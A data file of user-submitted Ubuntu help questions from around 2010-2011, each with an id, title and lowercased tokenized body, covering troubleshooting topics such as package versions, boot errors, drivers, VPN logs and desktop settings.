33885	how to add gnome bar network manager to awn ?	i love the network manager in the gnome panel but i do n't want the gnome panel cause that is all i use it for . this is more of a feature request than a question . i know there is a network manager applet for awn in progress but is n't there another way to get the gnome panel network manager working from the avant window navigator dock ? ? ?
33889	`` u1conflict '' folders appearing in thunderbird	i activated ubuntu one with the intent to sync just a few specific files between my desktop and laptop . i use thunderbird as my mail client on the desktop , but evolution on the laptop ( no particular reason for the difference . ) i started the process by connecting the desktop to ubuntu one . although i have n't specified any email syncing , the thunderbird sidebar now displays folders , usually empty , with names like `` archive.sdb.u1conflict '' and `` sent.u1conflict '' . this is before i have attempted to connect my laptop . viewing the ~.thunderbird folder and its subfolders in nautilus shows no indication of syncing , and the only items in the dashboard lists are the files i have designated to be uploaded . since i have no need to sync my email ( and it may be difficult or impossible to do so with the different clients ) is there a way to have ubuntu one sync only the files i specify , and nothing else ?
33890	how to default to newest version of python ?	i am using ubuntu 10.10 and just installed python 3.1 but entering python on my gnome terminal gets me python 2.6 . how to fix it to get python 3.1 on typing python on the terminal ?
33896	problem with chmod command	i do n't know what is happening experimentx @ workmatex : /var/www $ sudo chmod 0777 -r /var/www/ chmod : can not access `0777 ' : no such file or directory experimentx @ workmatex : /var/www $
33897	can i get tv-out through vga ?	i have a vga to rca cable and an intel graphic media accelerator video card , but i 'm not sure if my graphics card has tv-out function capability through the vga and if ubuntu supports this . my laptop is acer aspire 5740 with core i3 .
33900	is rhythmbox in active development ?	i see this thrown around a lot : `` rhythmbox is great , but too bad it 's no longer being actively developed , which is why i switched to banshee . '' can someone please clear this up for me , because the way i read that , it tells me the rhythmbox project has/is going to be abandoned .
33904	how to recover from fullscreen crash ?	i was playing gnu freedink and when i exited out it just sort of crashed and stayed fullscreen with the music playing . i could n't for the life of me get back to the desktop , alt-tab did nothing , same with ctrl-alt-delete , esc , etc . i 've had this happen with fullscreen games , and i usually wind up have to hard-reset to get back . pretty frustrating . i googled around and found xkill , but that wont launch on a fullscreen app . i tried ctrl-alt-f2 which puts me to terminal , i can run top but it would n't kill freedink and it would n't let me start the x server again . i really did n't know what i was doing . at least in windows 7 you can usually get to the task manager and kill the program , but i have n't found anything like ubuntu to get me back . anything i can do ?
33907	how to increase disk space ?	i am running out of space on my notebook , so i thought i would delete some unused stuff . i was thinking about : cleaning the home folder as explained in : cleaning up my home directory removing old logs from /var/log removing apt cache any other ideas ?
33915	how can i solve my boot error with natty and btrfs ?	i 'm getting this boot error on natty : mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg . the root system is using btrfs . however , when i boot up a live-cd , i can mount the system partition without any problems and there does n't appear to be anything wrong with it . running btrfsck gives this output : sudo btrfsck /dev/md0p1 found 33322205184 bytes used err is 0 total csum bytes : 32134752 total tree bytes : 401801216 total fs tree bytes : 334020608 btree space waste bytes : 104869496 file data blocks allocated : 38219010048 referenced 33116684288 btrfs btrfs v0.19 i hope someone can help me out with this problem .
33917	what package provides the functionality to suggest which package to install when the user types an unknown command ?	on ubuntu 10.10 server when i type htop the result is simply : bash : htop : command not found i know that there is some software which i can install that tells me what i have to install that provides the ( in this example htop ) command . what do i have to install ?
33918	how to disable the nautilus searchbox ?	is there any way by which i can disable the textbox ? case study : say i have to locate a directory called `` xyz '' . i type `` xyz '' , and the browser will guide me to xyz directory , but i realise i also have to check in directory `` abc '' , then i have to press escape , or backspace delete and search again for `` abc '' . in kubuntu , i simply have to type `` abc '' after a gap of say a second . that is very handy . i believe this can be achieved without a search box . please tell me how .
33920	google chrome initial links typed into address bar lost into the ether ?	when i first open chrome , the first couple of links i type into the address bar completely disappear after pressing enter and the pages are n't loaded . running ubuntu 10.10 , is there any known fix for this problem ?
33923	is it possible to create users that can only use one directory ?	now i 've bought an ubuntu cloud server . i installed webmin this morning , and now i have a question . is it possible to create users that can only use one directory , svn , ftp , php , python , mysql , apache ? so for example , user kevin only may use /var/www/kevin/ ? and he may view everything in /var/www/ but not execute/write and all other stuff is forbidden to view/execute/write .
33928	extremely slow bootup	i 've been upgrading ubuntu since 8.04 . i never did a clean installation after that . recently my laptop is booting up extremely slow . it takes more than 150 seconds to boot up . how can i make it faster ? i 'm attaching the boot chart . is there anything unusual which is slowing down the boot up ?
33931	how to install older version on postgresql and php5 ?	because of differencies in package versions between my development machine and my provider 's server , i have to downgrade packages installed on my computer . in ubuntu 10.04 lts default postgresql version is 8.4 , but i need 8.3 . when i try to install postgresql-8.3 i get error : package postgresql-8.3 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package postgresql-8.3 has no installation candidate so , my first question is : how do i install postgresql 8.3 in ubuntu 10.04 . and the second question : how do i install php 5.2.6 , or at least 5.2 in ubuntu 10.04 ( where default version is 5.3.2 ) ?
33932	how to remove nautilus and intstall nautilus elementary with coverflow ?	i 'm on 11.04 64bit and want to change my default file manager from nautilus to nautilus elementary via ppa to keep it ( elementary ) regularly updated . i always want to know if gloobus coverflow and preview works in 11.04 and if it works steps involved ? thanks in advance
33934	what is ubuntu 's market share on the desktop ?	what is ubuntu 's market share on non-servers ?
33936	move files with ssh	i know that i can copy files from my computers with scp . is there a way to move them at once instead of copying with ssh ?
33946	disable notifications on track change ?	i 've not long been running banshee on 11.04 , and my main problem with it is that when changing tracks a notification is displayed , this is all fine when using hardware buttons on my laptop to change track , but when using the sound menu the notifications overlap my sound menu . so i 'm just wondering if there is any way to disable notifications from showing , like there is in rhythmbox ? thanks ,
33949	how to repair apt-get command ?	when i try to install new package with apt-get install , it does n't work . apt-get update does n't work too . do you know how to reinstall it to work again ? output from sudo dpkg -- configure -a : dpkg : dependency problems prevent configuration of tvbrowser : tvbrowser depends on sun-java6-jre | sun-java5-jre ; however : package sun-java6-jre is not installed . package sun-java5-jre is not installed . dpkg : error processing tvbrowser ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : tvbrowser output from sudo apt-get install sun-java6-jre reading package lists ... done building dependency tree reading state information ... done package sun-java6-jre is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package sun-java6-jre has no installation candidate this pastebin has the output of find /etc/apt/ -name '*.list ' -ls -exec cat { } \ ; > repositories.txt .
33950	open application to edit text files from the command line	when installing the textwrangler in osx you also get an edit command which allows you to open any text file from the command line . is it possible to have a similar functionality in ubuntu to type some command on the terminal to open a file in a specific text editor ( say kate ) ?
33955	lost 3 of my 4 cores	i am running ubuntu 10.10 since i thought the upgrade was safely possible on my working machine ( programmer here ) . i recently got a freeze now and then , but slowly it got really annoying , when it went from once in a while to once a day . so i googled around for potential causes and re-installed the graphic driver ( ati radeon hd 4300 ) . after this , i suddenly only have one core left - there should be 4 , since i have an i5 ! when i run ubuntu from a live-cd everything is fine - so it is not a hardware problem ... any ideas , what i can do without re-installing ? per request : model name : intel ( r ) core ( tm ) i5 cpu 750 @ 2.67ghz
33958	how to correctly start a ubuntu user-mode-linux from the command line	i have installed the package user-mode-linux for the uml kernel . i have built a user mode linux filesystem using the commands at : http : //kuparinen.org/martti/comp/ubuntu/en/uml.html i have even tried the ubuntu filesystem from : http : //fs.devloop.org.uk/ but it seems that i can not get a ubuntu filesystem started correctly . even though both the fedora and suse filesystems work and present a prompt . i have started the system using various methods but i do n't seem to be able to get a login prompt . my current command line is : linux ubda=./ubuntu-maverickmeerkat-i386-root_fs mem=512m umid=maverick con0=xterm con1=xterm con=null but this causes me to have errors and no prompt for accessing the system . initializing cgroup subsys cpuset linux version 2.6.35.1 ( root @ rothera ) ( gcc version 4.4.5 20100813 ( linaro prerelease ) [ release 2010.08-0 ] ( ubuntu/linaro 4.4.4-8ubuntu2 ) ) # 2 mon aug 16 10:45:47 utc 2010 ( ) built 1 zonelists in zone order , mobility grouping on . total pages : 135115 kernel command line : ubda=./ubuntu-maverickmeerkat-i386-root_fs mem=512m con0=xterm con1=xterm con=null root=98:0 pid hash table entries : 4096 ( order : 2 , 16384 bytes ) dentry cache hash table entries : 131072 ( order : 7 , 524288 bytes ) inode-cache hash table entries : 65536 ( order : 6 , 262144 bytes ) allocated 2723580 bytes of page_cgroup please try 'cgroup_disable=memory ' option if you do n't want memory cgroups memory : 507252k available slub : genslabs=13 , hwalign=64 , order=0-3 , minobjects=0 , cpus=1 , nodes=1 hierarchical rcu implementation . rcu-based detection of stalled cpus is disabled . verbose stalled-cpus detection is disabled . nr_irqs:15 calibrating delay loop ... 3774.87 bogomips ( lpj=18874368 ) pid_max : default : 32768 minimum : 301 security framework initialized apparmor : apparmor initialized yama : becoming mindful . mount-cache hash table entries : 512 initializing cgroup subsys ns initializing cgroup subsys cpuacct initializing cgroup subsys memory initializing cgroup subsys devices initializing cgroup subsys freezer checking for host processor cmov support ... yes checking that host ptys support output sigio ... yes checking that host ptys support sigio on close ... no , enabling workaround using 2.6 host aio net : registered protocol family 16 bio : create slab < bio-0 > at 0 netlabel : initializing netlabel : domain hash size = 128 netlabel : protocols = unlabeled cipsov4 netlabel : unlabeled traffic allowed by default switching to clocksource itimer apparmor : apparmor filesystem enabled net : registered protocol family 2 ip route cache hash table entries : 8192 ( order : 3 , 32768 bytes ) tcp established hash table entries : 32768 ( order : 6 , 262144 bytes ) tcp bind hash table entries : 32768 ( order : 5 , 131072 bytes ) tcp : hash tables configured ( established 32768 bind 32768 ) tcp reno registered udp hash table entries : 512 ( order : 1 , 8192 bytes ) udp-lite hash table entries : 512 ( order : 1 , 8192 bytes ) net : registered protocol family 1 mconsole ( version 2 ) initialized on /home/andrew/.uml/maverick/mconsole checking host madv_remove support ... ok mapper v0.1 mmapper_init - find_iomem failed uml watchdog timer host tls support detected detected host type : i386 ( gdt indexes 6 to 9 ) audit : initializing netlink socket ( disabled ) type=2000 audit ( 1302186437.301:1 ) : initialized vfs : disk quotas dquot_6.5.2 dquot-cache hash table entries : 1024 ( order 0 , 4096 bytes ) squashfs : version 4.0 ( 2009/01/31 ) phillip lougher jfs : ntxblock = 3962 , ntxlock = 31703 sgi xfs with acls , security attributes , realtime , large block/inode numbers , no debug enabled sgi xfs quota management subsystem btrfs loaded msgmni has been set to 990 alg : no test for stdrng ( krng ) io scheduler noop registered io scheduler deadline registered ( default ) softdog : can not register miscdev on minor=130 ( err=-16 ) tcp cubic registered net : registered protocol family 17 initialized stdio console driver console initialized on /dev/tty0 console [ tty0 ] enabled initializing software serial port version 1 console [ mc-1 ] enabled ubda : unknown partition table registered taskstats version 1 ext3-fs ( ubda ) : error : could n't mount because of unsupported optional features ( 240 ) ext2-fs ( ubda ) : error : could n't mount because of unsupported optional features ( 240 ) ext4-fs ( ubda ) : mounted filesystem with ordered data mode . opts : ( null ) vfs : mounted root ( ext4 filesystem ) readonly on device 98:0. modprobe : fatal : could not load /lib/modules/2.6.35.1/modules.dep : no such file or directory init : ureadahead main process ( 756 ) terminated with status 5 init : console-setup main process ( 777 ) terminated with status 1 udevd [ 787 ] : failed to create queue file : no such file or directory udevd [ 787 ] : error creating queue file init : udev main process ( 787 ) terminated with status 1 init : udev main process ended , respawning init : udevmonitor main process ( 789 ) terminated with status 2 udevadm [ 1406 ] : error sending message : connection refused modprobe : fatal : could not load /lib/modules/2.6.35.1/modules.dep : no such file or directory modprobe : fatal : could not load /lib/modules/2.6.35.1/modules.dep : no such file or directory modprobe : fatal : could not load /lib/modules/2.6.35.1/modules.dep : no such file or directory modprobe : fatal : could not load /lib/modules/2.6.35.1/modules.dep : no such file or directory line_ioctl : tty7 : unknown ioctl : 0x4b70 line_ioctl : tty7 : unknown ioctl : 0x5602 line_ioctl : tty7 : unknown ioctl : 0x5603 line_ioctl : tty7 : unknown ioctl : 0x4b3a line_ioctl : tty7 : unknown ioctl : 0x5606 line_ioctl : tty1 : unknown ioctl : 0x4b3a mountall : disconnected from plymouth init : plymouth main process ( 757 ) killed by segv signal init : plymouth-splash main process ( 1407 ) terminated with status 2
33961	configuring pidgin-sipe in empathy	while adding my communicator account in pidgin was a cakewalk , i am struggling with the connection preferences in empathy . can anyone give me the steps ?
33963	how to retrieve public url of a file via cmd line ?	how can i get the public url of a file via a command ? i need to do this within a lua script , so python or whatever else api 's are offered are n't any good .
33969	up-to-date hardware compatibility lists	i 'm looking for an up-to-date list of nic 's compatible with ubuntu 10.10 . one of the pc 's here in the office suffered a network hardware failure in the on-motherboard network interface . we 've fitted an off-the-shelf pci nic from a local pc store , but the machine wo n't boot with the card installed . it may be a driver issue , but the supplied driver wo n't compile with the 2.6.35 kernel on that machine . so i 'd like to buy a replacement card that will be supported out-of-the-box , but the only hcl i can find is this wiki page , last updated in 2009 . we ca n't find any of the devices on that list on sale locally . failing a general list , can anyone suggest a good drop-in nic that will `` just work '' with lucid ?
33971	problems with opera 's launcher	when i install opera and open it the first time an opera launcher shows up in unity . i then set it to be kept . however , after having used opera a couple of times the launcher stops working , and when i open opera from the applications menu i either get no opera launcher , or i get another icon for opera widget managemnt . it 's like unity `` forgets '' opera and thinks the widget manager/installer is he opera application . since opera works fine in gnome this seems to be a unity problem . any idea how to resolve it ? i 'm using opera 11.10 beta on fully updated natty beta x64 .
33972	can i set a horizontal layout for workspaces ?	i just ca n't find how to get a workspace grid using gnome 3 . it just stays vertical , width of 1 and unlimited height ... any help would be really appreciated . thanks .
33973	incomplete install and i can not see part of the hard disk	i had tried to install ubuntu 10.10 near a windows7 in a 64 system . the installation was suppose to be 512gb left for win and 512gb for ubuntu . the installation hanged and on restart windows sees only his 512 partition . when i try again to install ubuntu i only see the windows partition . how can i recover the lost partition and install ubuntu there ?
33976	is there a hardware temperature sensor indicator ?	well , just like the title says : is there any hardware sensors indicator so i can add it to unity 's panel ? i only found applets for the older gnome panel .
33984	script to get the ( short ) installed app list similar to ubuntu software center ?	how would i go about writing a script to get the same list of installed software as reported by the ubuntu software center ? every reference i can find mentions either dpkg -l or rpm -qa ( or some variant thereof ) , but these typically include every single last package and library and what-not , and you end up with a list of 1000+ entries . the ubuntu software center app however shows a much of concise ( and human-friendly ) list -- currently 67 items on my ubuntu box . this is the sort of list i 'm interested in . can anyone point me to a script that can obtain something similar ? preferably something that can run on other distributions , but i 'll take whatever i can get . thanks .
33991	why do the default applications in ubuntu always change ?	in version 9.10 they replaced pidgin with empathy in version 10.10 f-spot was replaced with shotwell in the next version gnome will be replaced with unity rhythmbox will be replaced by banshee openoffice will be replaced by libreoffice . i know i can still choose to install any of these applications . but i think these steps shrink the development communities and the support for each of these programs . it also causes general confusion since in each version something works completely differently . what i do n't understand is , why are always young , less stable , and less mature programs being taken time after time , instead of putting effort into the current , well working programs ?
33999	ubuntu for netbooks	i just bought a new toy an asus eee 1015pn . i have no experience with ubuntu but i wish to learn to use it . i wish to hear your advice . optional & off-topic : i did n't dig the subject , but is android a valid choice for me ?
34004	banshee 2.0 upgrade not available	note : problem solved original question : i have added the banshee stable ppa to my list of software sources . launchpad says that 2.0 has been built and it is available . the problem is that the version synaptic will install is 1.9.6 ( i have the unstable ppa enabled too ) where 2.0 > 1.9.6 . btw i am running elementary os jupiter ( which is based of maverick ) answer : launchpad failed to build for maverick , lucid , and karmic
34007	how do i upgrade to the development release without graphics ?	there was a question how do i upgrade to the development release ( aka . ubuntu+1 ) ? the solution is to use update-manager -d and that pop-up a gui . i do n't have access to graphics . i 'm hoping that the upgrade would solve my graphics ( x-org , ... ) issues . how can i upgrade from the console ?
34009	can i get portable applications for ubuntu ?	i dont want to use internet everytime to install common application like vlc , etc.. is there a site for portable apps for ubuntu ?
34010	keyboard shortcut to hide/unhide the panel ?	is there a way to assign a keyboard shortcut to hide or unhide a specific gnome-panel ? edit : is there was a way to make a button combination have the auto-hide panel slide out , as if i had hovered my mouse on that side of the screen ?
34011	problem recompiling using make command	i 'm trying to modify some c++ files in ns2 and then recompile using make command . although new .o file is created after make , the output is similar to that of previous c++ file ( before modifying ) . can someone suggest what may be the reason behind it ?
34012	macbook pro power consumption /graphics card	updated version : hi i have a 10.10 install on a macbookpro 5,3 . ubuntu uses quite a lot of power and has a really low battery life . i 've already disabled bluetooth and the isight camera . the macbook has two different graphics cards.the `` big '' one is a geforce 9400m , but i do n't have a clue about the `` small '' one ( maybe someone could tell me how to figure out which one it is ? ) . is there a way to tell ubuntu which one to use ? usually a change to the smaller one save me 2-3 hours of battery on osx . thanks
34014	people nearby and bonjour not working over the same wireless and wired network	i 'm trying to send files from one computer to the other using empathy , but on my desktop and laptop , empathy is only picking up pidgin 's bonjour account on both computers . ( i 've got pidgin installed so that mxit works ) . i 'm using the same network , with the laptop over wireless and the desktop over wired , no pppoe . samba is installed on the desktop , but not the laptop . also , i ca n't access the desktop computer 's shares from the laptop . what could the cause of the problem be ?
34022	is there a common use case documentation available for unity ?	unity will introduce a new desktop paradigm for most of us . therefore alot of people may wonder how to perform their common use cases , e.g . : how do i open an application ? how do i find an application ? how do i configure my desktop ? how do i utilize the virtual desktops in a meaningful way ? how do i add an application to the launcher ? how do i switch between open applications ? how do i categorize my applications like i was used to do it in the old menu ? how do i assign personal hotkeys ( not numbers ) to my favourite applications ? and so on ... is there a guideline or documentation available that helps users to transition to the new desktop ?
34026	how can i install multiple versions of firefox ( 4.0 and 3.6 ) , preferably using apt	i have the firefox package ( firefox 3.6 ) installed in ubuntu 10.04 . i 'd like to install firefox 4.0 from the mozilla ppa but keep 3.6 ? the instructions look like they 'll replace the current firefox package with the new firefox . is it possible to install both using apt-get ? is there a way to name the executables firefox-3.6 and firefox-4.0 and have firefox point at one of them ? if you ca n't use apt , what 's the best way to install multiple packages with the same name that will automatically update themselves ( or at least be easy to update ) ?
34029	ubuntu entry in windows vista still there , even after uninstall	ok , so the other day i had a disc that i had burned ubuntu 9.10 karmic koala to . so i though , `` hey ! why not dual boot my computer ? '' i inserted the disc into drive e , ran wubi , installed it , and rebooted . however , when windows shut down and my computer restarted , the bios boot screen never came up for about 10 minutes . in a panic , i did a hard shutdown on my computer ( which was a bad move , by the way ) and afterwards , i turned my computer back on and it booted windows fine , but it said wubildr.mbr was missing or corrupt . when i reinstalled wubi , there were two ubuntu entries and both continued the installation process . but when i uninstalled wubi , i still had a renegade ubuntu entry saying wubildr.mbr was missing or corrupt . any ideas on how to get rid of that entry ? thanks in advance = ]
34035	grub fails to install on custom usb iso	i 'm trying to create a custom iso of an ubuntu install - that way , i can install a bunch of educational programs & plugins on one computer and they 'll automatically be on every computer i install the iso on . what i 'm doing right now is using remastersys to create a distributable version of ubuntu . it creates the iso , but i ca n't burn to a cd ( the file is 1.1gb ) and the computers in question do n't have dvd drives . so i tried putting the iso onto a usb instead via the included startup disk creator . it boots and installs fine for the most part , but at the very end of the installation , it tells me that it ca n't install grub . does anyone have any idea how to fix this ? or , alternately , is there a tool other than remastersys that you 'd suggest using for creating a distributable iso ?
34041	installation error with checkinstall	after solving all the dependencies ( ./configure , make , sudo checkinstall ) terminal reports . please help me compile my first source package in ubuntu . i 'm building the package in /usr/local/src on 10.10 netbook edition . what do i do because i know i 'm so close to my goal . thanks in advance
34045	how do i get this cisco vpn client to connect ?	i 've got ubuntu 10.10 64 bit and installed network-manager-vpnc and configured the connection but i keep getting this : networkmanager [ 1217 ] : < info > starting vpn service 'org.freedesktop.networkmanager.vpnc ' ... networkmanager [ 1217 ] : < info > vpn service 'org.freedesktop.networkmanager.vpnc ' started ( org.freedesktop.networkmanager.vpnc ) , pid 4420 networkmanager [ 1217 ] : < info > vpn service 'org.freedesktop.networkmanager.vpnc ' appeared , activating connections networkmanager [ 1217 ] : < info > vpn plugin state changed : 1 networkmanager [ 1217 ] : < info > vpn plugin state changed : 3 networkmanager [ 1217 ] : < info > vpn connection 'csi ' ( connect ) reply received . modem-manager : ( net/tun0 ) : could not get port 's parent device networkmanager [ 1217 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/tun0 , iface : tun0 ) networkmanager [ 1217 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/tun0 , iface : tun0 ) : no ifupdown configuration found . kernel : [ 2281.723506 ] tun0 : disabled privacy extensions avahi-daemon [ 1109 ] : withdrawing workstation service for tun0 . networkmanager [ 1217 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/tun0 , iface : tun0 ) networkmanager [ 1217 ] : < warn > vpn plugin failed : 1 networkmanager [ 1217 ] : < info > vpn plugin state changed : 6 networkmanager [ 1217 ] : < info > vpn plugin state change reason : 0 networkmanager [ 1217 ] : < warn > error disconnecting vpn : could not process the request because no vpn connection was active . networkmanager [ 1217 ] : < info > policy set 'auto eth0 ' ( eth0 ) as default for ipv4 routing and dns . networkmanager [ 1217 ] : < info > starting vpn service 'org.freedesktop.networkmanager.vpnc ' ... networkmanager [ 1217 ] : < info > vpn service 'org.freedesktop.networkmanager.vpnc ' started ( org.freedesktop.networkmanager.vpnc ) , pid 4547 networkmanager [ 1217 ] : < info > vpn service 'org.freedesktop.networkmanager.vpnc ' appeared , activating connections networkmanager [ 1217 ] : < info > vpn plugin state changed : 1 networkmanager [ 1217 ] : < info > vpn plugin state changed : 3 i 've seen a couple of bugs on launchpad that could be the same thing or have i done something wrong ?
34047	apple trackpad is not connected after todays update on natty	today , i had to update natty to get unity fix for ati proprietary driver ( 2 hours back ) . however , later find out that , apple trackpad stopped working . its not even connecting.. ~ $ sudo hidd -- connect xx : yy : zz : aa : bb : cc ca n't create hid control channel : connection refused any idea , what could have happened ? .
34048	keyboard indicator for layouts with the same country code	there appears to be no way to remove the keyboard indicator when multiple keyboard layouts are used in newer ubuntu releases . i have started using ian scott 's flag icons found here to save space in the indicator area . the problem is both of my keyboard layouts ( standard usa and usa dvorak ) have the same country code so that the indicator does not indicate which layout i have selected . is there any way for the keyboard indicator to use different icons for layouts with the same country code ?
34049	window interface snap window	basically when i try snap window to the left or right and move it up/down or snap to the top and move it left/right , i have something that can be described as invisible border moves and erases content of the window . is it suppose to be like this ?
34053	fonts showing missing segments	i 've got a new ubuntu installation which is working 99 % ok , except for one small problem with the fonts being displayed . for sufficiently small fonts , pieces are missing . as an example , here is a render of http : //ubuntuforums.org/archive/index.php/t-20976.html in firefox with zoom standard . there are a large amount of missing pixels or segments from the characters being displayed . if i raise the zoom , these issues are still present , but the font is readable . this process is n't a long term solution , as then i ca n't fit as much text on my screen as i need , and it happens in other applications as well , where i ca n't zoom at will . i ca n't find a good resource that covers this , looking up anything with 'font ' in the title leads to gnof.font configs ( the fonts work though ) , or adding 'chunks missing ' leads to minecraft compatibility on linux systems . : / how might i fix this issue , and what 's the correct term for what 's happening here ? it 's not just firefox either , it 's anything . i have the same problems in other applications , but they 're usually of sufficiently large font to not be readily noticed .
34057	how do i change the wallpaper in gnome 3 via a script ?	the former way to change wallpaper in gnome2 consists in use gconftool-2 , but this tool has no effect in gnome3 . gconftool-2 -- type=string -- set /desktop/gnome/background/picture_filename /home/user/background.jpg
34058	how to check graphics card details ?	what command i can use to check my graphics card 's memory ? i have an on-board intel graphics card , and i am unsure if it 's memory is 128 mb or 256 mb !
34061	how do i make vim the default graphical text editor ?	while trying to make vim default instead of gedit , i found this could be done two ways : use defaults.list and make text/plain ( and others ) point to vim.desktop ( what is the format for creating .desktop files ? ) use update-alternatives and change gnome-text-editor ( right now it has only one alternative , so i guess i have to install one more . how to do that ? ) and which is the better way to do it ?
34066	mounting filesystem with special user id set	i want to mount the device /dev/sda3 to the directory /foo/bar/baz . after mounting the directory should have the uid of user johndoe . so i did : sudo -u johndoe mkdir /foo/bar/baz stat -c % u /foo/bar/baz johndoe and added the following line to my /etc/fstab : /dev/sda3 /foo/bar/baz ext4 noexec , noatime , auto , owner , nodev , nosuid , user 0 1 when i do now sudo -u johndoe mount /dev/sda3 the command stat -c % u /foo/bar/baz results in root rather than johndoe . what is the best way to mount this ext4-filesystem with uid johndoe set ?
34074	how do i change my username ?	some time ago when i installed ubuntu i chose a rather stupid username for my account that i do not want to use anymore . how do i change this ( including the name of my home directory ) without loosing settings for applications ? how do i keep permissions and my keys for various authentification ( e.g . email , ssh , gpg and more ) ? what settings could possibly get lost if i changed my username ? both , command-line and graphical solutions are appreciated .
34077	libreoffice missing certain microsoft fonts	i do n't have these fonts : times new roman , arial and calibri ... , like in microsoft office ? what can i do ?
34082	php-fastcgi start command not found	i have set up nginx on my server , and now want to allow it for php files too , i followed http : //library.linode.com/web-servers/nginx/php-fastcgi/ubuntu-10.04-lucid step by step . but for /etc/init.d/php-fastcgi start command it shows file not found . please help me out .
34083	clone screen default ( projector )	how to make your ubuntu use `` clone '' screen , when i input projector ? it always go to extended desktop and then i need to check `` clone screen '' and apply . how to make it remember i always want to `` clone '' ? i am using ati open-source drivers .
34085	how to remove edit menu option ?	when we right click the main menu on the panel we get some options . is it possible to remove edit menus option from that ?
34087	is there native software similar to comic book life for linux ?	is there native software similar to comic book life for linux ? if you 've ever used the software you 'll see that it 's specially designed and optimised for easily creating simple comic books . i 've already tried using inkscape and gimp ( with some custom templates ) and whilst they allow for finer control of graphics they 're far too complex for the task at hand
34088	ca n't install with usb pen drive , syslinux problem	i 'm on ubuntustudio and i want to format my hd and try kubuntu ( install in my acer notebook , no partion , no double operating system problem , only istall it ) i 've downloaded iso file ( kubuntu-10.10-desktop-i386.iso ) , insert usb pen drive , then : system > administration > startup disk creator erased usb pen content , and `` make startup disk '' finally , reboot computer with pen inside usb port normal boot did n't start ( as expected ) but only black screen with this signal : syslinux 4.03 2010-10-22 edd copyright ( c ) 1994-2010 , h. peter anvin et al unknown keyword in configuration file boot : i 've tried different usb pen stick and different iso files ( ubuntu , kubuntu , netbook edition ) .. always same problem ( sometimes only the first line without `` unknow keyword in conf file '' error ) some advice ? ? sorry for my bad english
34093	move the application to another workspace in xfce	i added new item to my xfce4-panel with right-click - > add new items - > workspace switcher . it 's properties are : number of rows 1 checked : switch workspaces using the mouse wheel unchecked : show workspace names do you know how to move a few applications to another workspace ? i ca n't figure out how to add second workspace . thank you
34095	`` ca n't connect to local mysql server through '' socket error	i install mysql and try start /usr/local/mysql/bin # ./mysql error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/tmp/mysql.sock ' ( 2 ) /usr/local/mysql/bin # any idea ?
34097	ubuntu 10.10 installs with no gui	i am helping a colleague who i having trouble installing ubuntu 10.10 . he downloaded the iso and installed into his memory stick . it works fine when he boots from the memory stick and uses it in live mode . but whenever he installs it , at the end of installation ( and on subsequent restarts ) all he gets is a terminal . the terminal is quite usable , and he can work in terminal mode fine , but after a while even the terminal is lost and the screen goes completely blank . we 've tried installing it several times , but it always ends up this way . can someone point out what is going wrong ? edit : his machine is a intel core-2 duo with a foxconn motherboard with integrated graphics ( intel ironlake chipset afaik ) .
34099	find number of files in folder and sub folders ?	i want to find the total count of the number of files under a folder and all its sub folders .
34100	how do i install fglrx ?	how can i install the fglrx driver nativly in natty . with support of the new xserver which is used in natty ?
34106	sphinx-build can not generate epub output	on ubuntu 10.10 when i run the command sphinx-build -b epub -d _build/doctrees . _build/epub , i see the following output : running sphinx v0.6.6 sphinx error : builder name epub not registered make : * [ epub ] error 1 it could just be a missing package , but i do n't know which one . the sphinx documentation page does n't say that the epub builder is only available in a later release .
34110	what essential apps and configuration tweaks to install on a new ubuntu laptop ?	edit - please close this as a dup ( was closed for the wrong reason ) . here is the existing question : what are the most useful programs installed after setup of a vanilla ubuntu ? i 'm a new ubuntu/linux user . what essential apps should i install , and what configuration tweaks will make my life easier ?
34111	how can i recover a vdi ( virtualbox ) file ?	i just deleted my virtualbox.dvi file and lost valuable information . i 'm using ubuntu 9.04 and the virtualbox is a windows xp image . detail 1 : i deleted using gnome , not terminal . detail 2 : the file is n't in trash , because when i saw that i was removing the file , i have canceled operation . so the file is n't in original folder neither in trash folder . i want to use foremost or scalpel , but i do n't know how to use these programs with dvi files ... thanks a lot !
34113	how to set both dual cores to userspace governor	i am trying to set both cores in my cpu to userspace governor by editing the contents of /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor and /sys/devices/system/cpu/cpu1/cpufreq/scaling_governor to be userspace . but after half of a minute , automatically , the content of the `` cpu0 '' file changes back to `` performance '' and often jumps between `` performance '' and `` powersave '' , while the content of the `` cpu1 '' file remains `` userspace '' . $ cat /sys/devices/system/cpu/cpu1/cpufreq/scaling_governor userspace $ cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor powersave $ cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor performance i was wondering why the `` cpu0 '' file is edited automatically back , if it means that manually modifying its content is bad for some reason ? anyway to manually change its content to be `` userspace '' ? thanks and regards !
34122	gdm does not prompt for password and does n't let me log in	running natty beta 1 . on install i set it to auto login because i was just playing around and testing . now i 'm using the computer a little and decided to turn off auto-login . the next time i booted i get to the login screen , click my name , and just get a plinking sound and no prompt for a password . the options that appear in the bottom panel when you normally enter a password blink then disappear . i can hit ctrl-alt-f2 and log in via text mode but do n't know where to go to fix this .
34123	mouse hover over submenu item does not expand menu until i leave and re-enter item	in gnome , whenever i click on a contextual menu item ( eg . right click on a window in the task bar ) and then hover over a sub-item ( eg . move to another workspace ) that is expandable , the submenu is not shown . in order to show the submenu , i have to click about 4 times with my left mouse button or leave the item again and re-hover the item with my mouse . why does the submenu item not expand automatically on the initial mouse-over ( hover ) ? update : this is a pretty fresh install without any special interface software , just the default gnome installation . ubuntu 10.10 with latest updates . also , this problem has been here since i installed ubuntu a couple of months ago ( the reason it is still a fresh install is because i rarely use ubuntu , because of bugs like these ) . update : my visual effects were on `` normal '' . i then set them to `` none '' , and now this issue has been resolved .
34124	how to skip the terminal update installing progress when the updates is in progress on the unwanted application	i want to skip the terminal update installing progress when the updates is in progress on the unwanted application without removing the source repository from source list
